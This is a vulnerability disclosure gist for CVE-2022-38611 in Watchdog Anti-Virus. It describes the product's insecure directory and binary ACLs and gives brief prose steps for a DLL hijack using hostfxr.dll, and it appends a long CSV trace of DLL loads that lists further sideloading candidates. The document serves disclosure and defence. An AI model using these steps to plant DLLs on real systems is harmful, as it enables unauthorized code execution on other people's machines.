Skip to content

Instantly share code, notes, and snippets.

@dru1d-foofus

dru1d-foofus/File_ACLs.txt

Last active October 20, 2022 16:18
Show Gist options
  • Save dru1d-foofus/835423de77c3522d53b9e7bdf5a28dfe to your computer and use it in GitHub Desktop.
Save dru1d-foofus/835423de77c3522d53b9e7bdf5a28dfe to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2022-38611 - WatchDog Anti-Virus Research
Raw
README.md

CVE-2022-38611 - Watchdog Anti-Virus v1.4.158 Vulnerabilities

CVE - https://nvd.nist.gov/vuln/detail/CVE-2022-38611

Watchdog Anti-Virus v1.4.158 has insecure ACLs applied to its core components; this includes:

  • The C:\Program Files (x86)\Watchdog Anti-Virus\ directory allows BUILTIN\Users the ability to modify the directory's and inherited objects's ACLs.
  • BUILTIN\Users are given full control of the WAV.exe binary itself and associated libraries.

These permissions issues could allow any user to execute code through DLL hijacking.

Steps to Reproduce DLL Hijack

  1. Identify a target for hijack. I've chose hostfxr.dll as it currently does not exist in my C:\Program Files (x86)\Watchdog Anti-Virus\ directory.
  2. Create malicious DLL with exported function. hostfxr.dll's hostfxr_main_startupinfo or DLLMain exports worked during testing.
  3. Copy malicious hostfxr.dll to the C:\Program Files (x86)\Watchdog Anti-Virus\ directory.
  4. Launch Watchdog Anti-Virus.

It should be noted that Watchdog Anti-Virus runs in the context of the current user and does not appear to elevate itself; therefore, there is only code execution and no privilege escalation.

Additional items included:

  • dll_results.csv; which contain other sideloading/hijacking candidates.
  • File_ACLs.txt; which contain a recursive listing of ACLs applied to files within the Watchdog Anti-Virus program directory.
Raw
dll_results.csv
We can make this file beautiful and searchable if this error is corrected: It looks like row 2 should actually have 4 columns, instead of 3 in line 1.
Executable,WinAPI,DLL,EntryPoint / WinAPI Args
unins000.exe,LoadLibraryW,LPCWSTR: Msctf.dll
unins000.exe,LoadLibraryA,LPCSTR: wtsapi32.dll
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\wtsapi32.dll, LPCSTR: WTSRegisterSessionNotification
unins000.exe,LoadLibraryA,LPCSTR: uxtheme.dll
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: BufferedPaintInit
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: OpenThemeData
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: CloseThemeData
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeText
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundContentRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundContentRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePartSize
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeTextExtent
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeTextMetrics
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundRegion
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: HitTestThemeBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeEdge
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeIcon
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemePartDefined
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeBackgroundPartiallyTransparent
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeColor
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeMetric
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeString
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBool
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeInt
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeEnumValue
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePosition
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeFont
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeMargins
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeIntList
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePropertyOrigin
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: SetWindowTheme
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeFilename
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysColor
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysColorBrush
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysBool
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysSize
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysFont
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysString
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysInt
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeActive
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsAppThemed
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetWindowTheme
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: EnableThemeDialogTexture
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeDialogTextureEnabled
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeAppProperties
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: SetThemeAppProperties
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetCurrentThemeName
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeDocumentationProperty
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeParentBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: EnableTheming
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\wtsapi32.dll, LPCSTR: WTSUnRegisterSessionNotification
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: BufferedPaintUnInit
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_main_startupinfo
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_set_error_writer
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_load
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_unload
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main_with_output_buffer
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_set_error_writer
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_initialize
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_initialize
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_shutdown_2
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_execute_assembly
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_create_delegate
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.CoreLib.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, dwFlags : NONE
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: jitStartup
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: getJit
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Console.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Thread.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Text.Encoding.Extensions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_DeflateInit2_
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Memory.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Crc32
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Deflate
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_DeflateEnd
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_main_startupinfo
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_set_error_writer
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_load
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_unload
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main_with_output_buffer
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_set_error_writer
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_initialize
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_initialize
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_shutdown_2
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_execute_assembly
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_create_delegate
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.CoreLib.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: jitStartup
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: getJit
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Domain.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Shared.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Console.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\Newtonsoft.Json.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\netstandard.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.Win32.Registry.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Serialization.Formatters.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Concurrent.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.TraceSource.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.Expressions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Numerics.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.Uri.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.TypeConverter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ObjectModel.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Serialization.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Data.Common.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Xml.ReaderWriter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.Xml.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Emit.ILGeneration.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Emit.Lightweight.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\BCrypt.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Memory.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\log4net.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\System.Configuration.ConfigurationManager.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Specialized.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.WebClient.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.EventBasedAsync.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Text.Encoding.Extensions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Thread.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.NonGeneric.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.StackTrace.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Metadata.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Immutable.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.InteropServices.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_InflateInit2_
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Inflate
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Principal.Windows.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\System.Threading.AccessControl.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
